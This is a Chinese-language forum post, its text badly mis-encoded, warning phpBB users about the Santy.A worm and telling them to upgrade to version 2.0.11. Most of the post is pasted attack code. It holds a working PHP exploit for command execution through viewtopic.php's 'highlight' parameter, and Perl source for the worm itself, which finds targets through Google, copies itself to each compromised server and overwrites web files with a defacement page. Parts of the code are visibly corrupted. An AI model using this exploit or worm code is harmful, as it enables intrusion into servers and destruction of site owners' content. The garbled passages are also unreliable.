phpbb论坛用户请立刻升级为最高版本[警告]

陪你去看龙卷风

新手上路
VIP
注册
2002-10-12
消息
11,271
荣誉分数
61
声望点数
0
咀站型病毒 Santy.A 利用 phpBB 弱?咄行感染,phpBB 用?需蓖速更新程式
------------------------------------------------

phpBB ??受使用的咀站??程式,由於 phpBB ??程式中的 viewtopic.php 存在安全弱?,自 11 月份公?弱?後,?客便檫始利用弱?咄行攻?,置?咀站?面及膏取儋料。在 2004/12/22 办?,?客更咄一步的?此弱?的?成 Santy.A 病毒。

安全弱?是办生在 viewtopic.php 中,由於 urldecode() 函?在?理 "highlight" ???未充分咿?使用者提供的儋料?容,而可以?哞端攻?者在安砚 phpBB 的伺服器?行任意程式瘁。

受影?的 phpBB ??程式? 2.0.11 之前的版本,Santy.A 是透咿 Google 搜?引擎找?安砚 phpBB 的伺服器,然後攻?呃些存在安全弱?的伺服器,?攻?成功後,Santy.A ??自己妖氧到受感染的主?,?且使用以下?容覆慎 asp, .htm, .jsp, .php, .phtm, .shtm ?案。

This site is defaced!!!
NeverEverNoSanity WebWorm generation (感染?)


建阻安砚 phpBB ??程式的用?蓖速更新至 2.0.11 版本。
 
EXPLOIT CODE:
http://packetstormsecurity.nl/0411-exploits/phpbb.php.txt
PHP: 
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark ([url]http://www.howdark.com[/url]) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: [url]http://127.0.0.1/html[/url])\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: [url]http://10.10.10.10:8080[/url])\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";    
    }
    return $chr;
}
?>
 
PHP: 
Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
#                          ~~ For educational purpose ~~ 
#
# See : [url]http://isc.sans.org/diary.php?date=2004-12-21[/url]
#          [url]http://www.k-otik.com/news/20041221.phpbbworm.php[/url]
#          [url]http://www.f-secure.com/v-descs/santy_a.shtml[/url]
#
#!/usr/bin/perl
use 
strict;
use Socket;


sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3) 
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527'; 
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . 
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26 
alt="" border=0>
\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=([url]http://\S+viewtopic.php\S+[/url])#g) {
my $u = $1;
next if $u =~ m#[url]http://.*http://#i;[/url] # no redirects
push(@urls, $u);
}

return @urls;
}


sub GrabURL($) {
my $url = shift;
$url =~ s#^[url]http://##i;[/url]

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r = 
"GET $resHTTP/1.0\015\012" . 
"Host: $host\015\012" . 
"Accept:*/*\015\012" . 
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: [url]http://[/url]" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>; 
close (Server);

return $answer;
}


sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
 bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS>[b]NeverEverNoSanity WebWorm generation } 
. $generation .q{.[/b]</ADDRESS>
>>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i 
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d 
for my $d (@dirs) {
DoDir($d); 
}
}
 
.......................
 
友情看一眼......
 
您必须登录或注册才可回复。

相关推荐

Saint88
解读全新宝马X5升级版防弹车
回复
0
查看
601
Saint88
Saint88
Saint88
微软警告XP用户:若不升级永遭zero day攻击
回复
0
查看
306
Saint88
Saint88
guest
穆迪警告法国或将失去最高信用评级
回复
0
查看
22
guest
guest
guest
阿联酋将启用超级公交车最高时速250公里
回复
0
查看
35
guest
guest
guest
日本明年将建2.4万吨级航母为自卫队最大战舰
回复
0
查看
31
guest
guest
后退
顶部